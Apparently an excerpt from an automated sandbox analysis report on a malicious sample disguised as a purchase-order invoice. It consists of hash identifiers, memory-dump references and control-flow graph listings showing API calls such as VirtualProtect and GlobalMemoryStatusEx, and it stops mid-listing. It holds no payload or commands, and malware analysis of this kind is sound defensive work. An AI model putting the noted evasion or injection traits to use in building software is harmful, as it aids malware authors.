                                                            • Opcode ID: b0e86f7e8e1d3f845723dce14de908bca87a1aea54b76e148138a26ba94b4613
                                                            • Instruction ID: a8a5af724b8e19d376c73b38e8214f97e00240ab9ea52d3a987db828591fc2de
                                                            • Opcode Fuzzy Hash: b0e86f7e8e1d3f845723dce14de908bca87a1aea54b76e148138a26ba94b4613
                                                            • Instruction Fuzzy Hash: 71413431A0CA988FE725DBA898A56F97FE0EF53324F0441BFD089C7193DA297849C751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (rendered node/edge list omitted; legend: Executed / Not Executed)
                                                            • Function entry: 7ffd34890ec5-7ffd34890ee3
                                                            • Imported API call: VirtualProtect (block 7ffd34890f1a-7ffd34892e4f)
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b70c70cdb815cf6bf1ec3cf3775b6998255d24c7809f7624e18c53a4970a089c
                                                            • Instruction ID: 461a585338766af67a18def423ad84cb3994b3128f1a9c762c9849ccbbbed216
                                                            • Opcode Fuzzy Hash: b70c70cdb815cf6bf1ec3cf3775b6998255d24c7809f7624e18c53a4970a089c
                                                            • Instruction Fuzzy Hash: 0A41E431A0CA8D4FEB18DBA898596FDBFE0EF66321F04027FD049C3192DB6468468791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (rendered node/edge list omitted; legend: Executed / Not Executed)
                                                            • Function entry: 7ffd34892d84-7ffd34892d8b
                                                            • Imported API call: VirtualProtect (block 7ffd34892d96-7ffd34892e4f)
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 66b52229d3acae203a5a4f92c397c789d9128913553a301167bfc3cf46ee5f70
                                                            • Instruction ID: 16f47ea17cd302a514e5172de3d94429d8d483e31c4c52c989f38da2584ed763
                                                            • Opcode Fuzzy Hash: 66b52229d3acae203a5a4f92c397c789d9128913553a301167bfc3cf46ee5f70
                                                            • Instruction Fuzzy Hash: 8531F831A0CA4C4FDB18DB9C98466F9BBE1FB56321F04426FD049D3192CF746856C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            (graph data omitted; the only API call in this graph is FreeConsole)
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID: ConsoleFree
                                                            • String ID:
                                                            • API String ID: 771614528-0
                                                            • Opcode ID: 282e8a0d377cb565f2cd24fe659e0e1841efd16c68d0ec2a0982305d8edc3660
                                                            • Instruction ID: 29f299a29b291688b7430652bb5581c4bb3917a5b688e3737475d5dede3cdfcd
                                                            • Opcode Fuzzy Hash: 282e8a0d377cb565f2cd24fe659e0e1841efd16c68d0ec2a0982305d8edc3660
                                                            • Instruction Fuzzy Hash: 9C31C571A0CB488FDB29DFA8D84A6FA7BF0EF56320F00426ED049D3192DB74A445CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2151235986.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34970000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9a4e0eb7c72b8217adf61ff34b517981aff4da8eb166e797b30a4c60c76f071
                                                            • Instruction ID: 9d39e503387f3fca96bc0c8a549152b364ab9af8f947c6bda79b2a475647db7a
                                                            • Opcode Fuzzy Hash: c9a4e0eb7c72b8217adf61ff34b517981aff4da8eb166e797b30a4c60c76f071
                                                            • Instruction Fuzzy Hash: 10414531A0CA894FDB56DF28CCA60A87FF1FF16300B0541BED589CB696EA28A841C741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .d$$gfff
                                                            • API String ID: 0-423341030
                                                            • Opcode ID: a4637abb0af41b68b17169bc6f7084b867f7666b97c91d65d5bdd5882465e0a0
                                                            • Instruction ID: f614ed5545537655c9c7a1c4ca1aa33d9734b3090d40ef5fe4f1fcceeba5bdea
                                                            • Opcode Fuzzy Hash: a4637abb0af41b68b17169bc6f7084b867f7666b97c91d65d5bdd5882465e0a0
                                                            • Instruction Fuzzy Hash: C151373260E3850FD31E863D9C965A17FA5DB8722070982FFD4C6CB1A3E958AC07C391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39ca99048702d55c60c7228dfccdc9061d4c3a38e3cdf62f8be3d435bc9ffe8f
                                                            • Instruction ID: 5df4773e9d2abddee1a2f8a62338b0e403c80b69a77cda5ffa37095e7bf2eced
                                                            • Opcode Fuzzy Hash: 39ca99048702d55c60c7228dfccdc9061d4c3a38e3cdf62f8be3d435bc9ffe8f
                                                            • Instruction Fuzzy Hash: 2FF17D31F1E98A4FE3E8CB1C88A656577D0FF8A310B1402B9D94DC7592DEACBC1653A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 478ae6c5cb56947789cae150aa37d85f797e83d08b0de72975a0f0705e50fcd0
                                                            • Instruction ID: 8b3c82858f6ba5394f7aff7a81c34edfffbe501fac4cd2677f106f3c3b87e974
                                                            • Opcode Fuzzy Hash: 478ae6c5cb56947789cae150aa37d85f797e83d08b0de72975a0f0705e50fcd0
                                                            • Instruction Fuzzy Hash: 8EF18031B0FA864FE7E9DB1C88A65713BD0EF57300B1405BAD94DCB2A2D95CBC0997A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb6f46fca3cbf2ba73df5770ae36b95aed5adbdc63060dc337c51d7484c3a70c
                                                            • Instruction ID: 90a7a8acbcec7761e7e0c04a4c2c7642aeedcb189d5f525b46e726dc64ad7fe9
                                                            • Opcode Fuzzy Hash: cb6f46fca3cbf2ba73df5770ae36b95aed5adbdc63060dc337c51d7484c3a70c
                                                            • Instruction Fuzzy Hash: C5F16E31B1E9854FE7F8DB1C84A667577D0FF8A310B1405B9D24DCB1A2DEACAC0683A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75a5a8d9501445e4ae39ee23e9225555fa7984956c1d8a1ebb4cd4f8a9ab4b85
                                                            • Instruction ID: 9458fedf5d6a58d8a6056af01ff732e1c6e14b59196db1ce9a3ae14e555b3e7e
                                                            • Opcode Fuzzy Hash: 75a5a8d9501445e4ae39ee23e9225555fa7984956c1d8a1ebb4cd4f8a9ab4b85
                                                            • Instruction Fuzzy Hash: D281A926A8E7C24FE3538B744CB50957FB59E1361071E51EBC984CF1E3EA0D580AE722
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 417855fb1fb5d33fee4ffed67f37656ecf172f77c6ca23542757f2774553d239
                                                            • Instruction ID: b55f32c0dd0c6b3abe8fbcdb87c0cd7d481a50634f9f8b0786a6abacb5cf16a6
                                                            • Opcode Fuzzy Hash: 417855fb1fb5d33fee4ffed67f37656ecf172f77c6ca23542757f2774553d239
                                                            • Instruction Fuzzy Hash: 8C718426A8E7C20FE31347744CB40A57FB5AE2365431E42EBC5D5CB0E3DA0D280AE722
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fecae9f6c5482d082198bf177daccb861c9e561450914e0581a92122ebad2c1f
                                                            • Instruction ID: 4b8f97f0b31f5609485e4cb0abde8c3e92ecfcdc1b5fc74cacb2dbc3b61bcbf1
                                                            • Opcode Fuzzy Hash: fecae9f6c5482d082198bf177daccb861c9e561450914e0581a92122ebad2c1f
                                                            • Instruction Fuzzy Hash: 9A710631E1DB860FD3569B6888A10A57FE0EF43310B1946FAC59AC76D3DA2CB8478B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:80.4%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:51
                                                            Total number of Limit Nodes:4
                                                            (execution graph data omitted; API calls reached in the graph: CreateWindowExW, CallWindowProcW, GlobalMemoryStatusEx)
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b5d635c209f4127f710f93e67917d29b5ac547c0a78f74997502f03c67651c9
                                                            • Instruction ID: a1da4ef8d6ecde6cf2518fc1c60d99e19d3236033243da5f9d4b4114af4a309d
                                                            • Opcode Fuzzy Hash: 0b5d635c209f4127f710f93e67917d29b5ac547c0a78f74997502f03c67651c9
                                                            • Instruction Fuzzy Hash: 4063FC31D10B5A8ACB11EF68C8905A9F7B1FF99310F15C79AE458B7125EB70AAC4CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87354762e498a973af33ceb7372e50d4899f603606237e8158c1b11d655a3cd5
                                                            • Instruction ID: db9dc2b8e0ee7dbeda981a65765bda20b4c87a40a7993a202dac083e12d95e4a
                                                            • Opcode Fuzzy Hash: 87354762e498a973af33ceb7372e50d4899f603606237e8158c1b11d655a3cd5
                                                            • Instruction Fuzzy Hash: 2B332E31D107198EDB11EF68C8806ADF7B1FF99310F15C79AE458AB215EB70AAC5CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            (graph data omitted; no named API calls in this graph)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \VTm
                                                            • API String ID: 0-628799665
                                                            • Opcode ID: 2859d2357503de3e6f5ea4e9157a5492affdda13b23b1641f4e2046ee5ceaf46
                                                            • Instruction ID: db61d43cbdc91eed4de09b7031e7f6035306a518719444222bc8d16d52481cb4
                                                            • Opcode Fuzzy Hash: 2859d2357503de3e6f5ea4e9157a5492affdda13b23b1641f4e2046ee5ceaf46
                                                            • Instruction Fuzzy Hash: 75919C70E00219DFDF14DFA9C9817EEBBF2AF88314F248129E414A7294EB749985DB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b793576fdb883987cb5a344b1200bb89cfe666a44cbaccebc3c74de233ca8a51
                                                            • Instruction ID: 1e3e07b3cb09085dcf8721d760ba6a8d5a2149e75929313205bc5dd060deab83
                                                            • Opcode Fuzzy Hash: b793576fdb883987cb5a344b1200bb89cfe666a44cbaccebc3c74de233ca8a51
                                                            • Instruction Fuzzy Hash: 9F32AD34A042058FDB14DFA8D984BADBBF6EF89310F24856AE505EB395DBB0DC41DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e49c9856789f12b69a3a01f2aee851ce58d2fa22f5a0698504f5af3cce12aabf
                                                            • Instruction ID: a5cae2e13ff426661b0a0afef6e26154613b364abfa6e8c27023d4d567485ff2
                                                            • Opcode Fuzzy Hash: e49c9856789f12b69a3a01f2aee851ce58d2fa22f5a0698504f5af3cce12aabf
                                                            • Instruction Fuzzy Hash: 3EB17C70E002098FDF14EFA9C89579DBBF2AF88714F248129D815EB394EB74A845DB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            (graph data omitted; no named API calls in this graph)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \VTm$\VTm
                                                            • API String ID: 0-2997445572
                                                            • Opcode ID: 1aa74f1399e521f6807fcb927275255d4435fd65e2eca531522b4ac2e5f0476c
                                                            • Instruction ID: 470e53de52057366660587398cd7dc33ee8b8f4104e2e0ddb36cd71c64de5bcd
                                                            • Opcode Fuzzy Hash: 1aa74f1399e521f6807fcb927275255d4435fd65e2eca531522b4ac2e5f0476c
                                                            • Instruction Fuzzy Hash: 15716970E002499FDF14EFA9C8857DEBBF2BF88724F148129E415A7294EB74A841DF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            (graph data omitted; no named API calls in this graph)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \VTm$\VTm
                                                            • API String ID: 0-2997445572
                                                            • Opcode ID: 5652021ae1426ed148746783b3bd018144546699160d174ab6b2bdec935ce2d1
                                                            • Instruction ID: f73fa805a27c5cc5a62a27b0554105916fc28912b4ad1f38b7efa69773c4e368
                                                            • Opcode Fuzzy Hash: 5652021ae1426ed148746783b3bd018144546699160d174ab6b2bdec935ce2d1
                                                            • Instruction Fuzzy Hash: A2714971E002499FDF10EFA9C8857DEBBF2BF88714F148129E415A7294EB74A841DF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic-block edge list; the executed/not-executed colouring of the rendered graph is not reproduced in text)
                                                            control_flow_graph 1209 5f0dcd0-5f0dcdb 1210 5f0dd05-5f0dd24 call 5f0d0b4 1209->1210 1211 5f0dcdd-5f0dd04 call 5f0d0a8 1209->1211 1217 5f0dd26-5f0dd29 1210->1217 1218 5f0dd2a-5f0dd89 1210->1218 1225 5f0dd8b-5f0dd8e 1218->1225 1226 5f0dd8f-5f0de1c GlobalMemoryStatusEx 1218->1226 1230 5f0de25-5f0de4d 1226->1230 1231 5f0de1e-5f0de24 1226->1231 1231->1230
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3311882283.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_5f00000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c14f67cdcf98cd0edb39487421d7394bfa245476ba7de8befe08cca7ea9c1809
                                                            • Instruction ID: dcbd1e7c26b47d97d46d356efc3d4e9c9f930af13bded3b80c567cc61a856f19
                                                            • Opcode Fuzzy Hash: c14f67cdcf98cd0edb39487421d7394bfa245476ba7de8befe08cca7ea9c1809
                                                            • Instruction Fuzzy Hash: A141D372E0435A8BCB14DFA9D8447EEBBF5EF89210F19856AD508E7280DB789845CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic-block edge list; the executed/not-executed colouring of the rendered graph is not reproduced in text)
                                                            control_flow_graph 1234 604d3a4-604d3a6 1235 604d3ae 1234->1235 1236 604d3a8-604d3ac 1234->1236 1237 604d3b6-604d416 1235->1237 1238 604d3b0-604d3b5 1235->1238 1236->1235 1239 604d421-604d428 1237->1239 1240 604d418-604d41e 1237->1240 1238->1237 1241 604d433-604d46b 1239->1241 1242 604d42a-604d430 1239->1242 1240->1239 1243 604d473-604d4d2 CreateWindowExW 1241->1243 1242->1241 1244 604d4d4-604d4da 1243->1244 1245 604d4db-604d513 1243->1245 1244->1245 1249 604d515-604d518 1245->1249 1250 604d520 1245->1250 1249->1250 1251 604d521 1250->1251 1251->1251
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D4C2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3312164189.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_6040000_jsc.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 3d4e13f8156afe8d7936b486a440ef447b676bbc79284d2d1cd69954a4a48ea4
                                                            • Instruction ID: aba07f56e94e998b80e9f4e1595d3728c207373b480e2c6d9f3829d0b251d1cd
                                                            • Opcode Fuzzy Hash: 3d4e13f8156afe8d7936b486a440ef447b676bbc79284d2d1cd69954a4a48ea4
                                                            • Instruction Fuzzy Hash: DC51C1B1D003499FDB54DF99C884ADEBFF5BF88310F24812AE819AB250D774A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic-block edge list; the executed/not-executed colouring of the rendered graph is not reproduced in text)
                                                            control_flow_graph 1252 604d3b0-604d416 1254 604d421-604d428 1252->1254 1255 604d418-604d41e 1252->1255 1256 604d433-604d4d2 CreateWindowExW 1254->1256 1257 604d42a-604d430 1254->1257 1255->1254 1259 604d4d4-604d4da 1256->1259 1260 604d4db-604d513 1256->1260 1257->1256 1259->1260 1264 604d515-604d518 1260->1264 1265 604d520 1260->1265 1264->1265 1266 604d521 1265->1266 1266->1266
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D4C2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3312164189.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_6040000_jsc.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 56c5916a046d15d23d61741a927e4cea1539d5b78fbd5a2a2d455b81191fb3ef
                                                            • Instruction ID: 9d26d7df3b568d09938cf64e3d0b6f970af537372c596df542a7beed48821c00
                                                            • Opcode Fuzzy Hash: 56c5916a046d15d23d61741a927e4cea1539d5b78fbd5a2a2d455b81191fb3ef
                                                            • Instruction Fuzzy Hash: 5441AEB1D003499FDB54DF9AC884ADEBFB5BF88310F24812AE919AB250D775A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic-block edge list; the executed/not-executed colouring of the rendered graph is not reproduced in text)
                                                            control_flow_graph 1267 604a88c-604fb3c 1271 604fb42-604fb47 1267->1271 1272 604fbec-604fc0c call 604a764 1267->1272 1273 604fb49-604fb80 1271->1273 1274 604fb9a-604fbd2 CallWindowProcW 1271->1274 1280 604fc0f-604fc1c 1272->1280 1281 604fb82-604fb88 1273->1281 1282 604fb89-604fb98 1273->1282 1277 604fbd4-604fbda 1274->1277 1278 604fbdb-604fbea 1274->1278 1277->1278 1278->1280 1281->1282 1282->1280
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0604FBC1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3312164189.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_6040000_jsc.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 3928f9acf3b5b6c519523a57e3ca739b979f5d3d71f571123893610694b5712e
                                                            • Instruction ID: 1f1a3308dc1ba95f48da116f7f80f09322e913106d3843482240e310a03a08d2
                                                            • Opcode Fuzzy Hash: 3928f9acf3b5b6c519523a57e3ca739b979f5d3d71f571123893610694b5712e
                                                            • Instruction Fuzzy Hash: 36411AB9900306CFDB54DF99C888AAEBBF5FF89314F24C859D519A7321D774A841CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic-block edge list; the executed/not-executed colouring of the rendered graph is not reproduced in text)
                                                            control_flow_graph 1292 5f0dda0-5f0dde6 1294 5f0ddee-5f0de1c GlobalMemoryStatusEx 1292->1294 1295 5f0de25-5f0de4d 1294->1295 1296 5f0de1e-5f0de24 1294->1296 1296->1295
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F0DD22), ref: 05F0DE0F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3311882283.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_5f00000_jsc.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 2510cd31fdcf19fdc92ec48117e4cfc9086711068aedb935ffc3497bc8a1432f
                                                            • Instruction ID: 11c9c488f1b2b41e7f904bd1c6baa7ae956c8c47c14c28f7db7a7a40c822da36
                                                            • Opcode Fuzzy Hash: 2510cd31fdcf19fdc92ec48117e4cfc9086711068aedb935ffc3497bc8a1432f
                                                            • Instruction Fuzzy Hash: A41114B2C0065A9BDB10DF9AC9447DEFBF4FF48320F14816AE918A7240D778A954CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic-block edge list; the executed/not-executed colouring of the rendered graph is not reproduced in text)
                                                            control_flow_graph 1285 5f0d0b4-5f0de1c GlobalMemoryStatusEx 1288 5f0de25-5f0de4d 1285->1288 1289 5f0de1e-5f0de24 1285->1289 1289->1288
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F0DD22), ref: 05F0DE0F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3311882283.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_5f00000_jsc.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 6f7f08f9581e250ca819be0c1e7c0bbb8e627aa262774e60165f3755f770e20d
                                                            • Instruction ID: b560ac266325ad218b303732ad269ef64539a20cd2cf4bc0c215358474de029b
                                                            • Opcode Fuzzy Hash: 6f7f08f9581e250ca819be0c1e7c0bbb8e627aa262774e60165f3755f770e20d
                                                            • Instruction Fuzzy Hash: DC1103B2C0065A9BCB10DF9AC5447DEFBF4EF48320F14816AE918A7240D7B8A950CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic-block edge list; the executed/not-executed colouring of the rendered graph is not reproduced in text)
                                                            control_flow_graph 1365 f63e27-f63e96 1368 f63ee0-f63ee2 1365->1368 1369 f63e98-f63ea3 1365->1369 1371 f63ee4-f63f3c 1368->1371 1369->1368 1370 f63ea5-f63eb1 1369->1370 1372 f63ed4-f63ede 1370->1372 1373 f63eb3-f63ebd 1370->1373 1380 f63f86-f63f88 1371->1380 1381 f63f3e-f63f49 1371->1381 1372->1371 1374 f63ec1-f63ed0 1373->1374 1375 f63ebf 1373->1375 1374->1374 1377 f63ed2 1374->1377 1375->1374 1377->1372 1383 f63f8a-f63fa2 1380->1383 1381->1380 1382 f63f4b-f63f57 1381->1382 1384 f63f7a-f63f84 1382->1384 1385 f63f59-f63f63 1382->1385 1390 f63fa4-f63faf 1383->1390 1391 f63fec-f63fee 1383->1391 1384->1383 1386 f63f67-f63f76 1385->1386 1387 f63f65 1385->1387 1386->1386 1389 f63f78 1386->1389 1387->1386 1389->1384 1390->1391 1393 f63fb1-f63fbd 1390->1393 1392 f63ff0-f64002 1391->1392 1400 f64009-f6403e 1392->1400 1394 f63fe0-f63fea 1393->1394 1395 f63fbf-f63fc9 1393->1395 1394->1392 1397 f63fcd-f63fdc 1395->1397 1398 f63fcb 1395->1398 1397->1397 1399 f63fde 1397->1399 1398->1397 1399->1394 1401 f64044-f64052 1400->1401 1402 f64054-f6405a 1401->1402 1403 f6405b-f640bb 1401->1403 1402->1403 1410 f640bd-f640c1 1403->1410 1411 f640cb-f640cf 1403->1411 1410->1411 1412 f640c3 1410->1412 1413 f640d1-f640d5 1411->1413 1414 f640df-f640e3 1411->1414 1412->1411 1413->1414 1415 f640d7-f640da call f60ab8 1413->1415 1416 f640e5-f640e9 1414->1416 1417 f640f3-f640f7 1414->1417 1415->1414 1416->1417 1419 f640eb-f640ee call f60ab8 1416->1419 1420 f64107-f6410b 1417->1420 1421 f640f9-f640fd 1417->1421 1419->1417 1422 f6410d-f64111 1420->1422 1423 f6411b-f6411f 1420->1423 1421->1420 1425 f640ff-f64102 call f60ab8 1421->1425 1422->1423 1427 f64113 1422->1427 1428 f64121-f64125 1423->1428 1429 f6412f 1423->1429 1425->1420 1427->1423 1428->1429 1430 f64127 1428->1430 1431 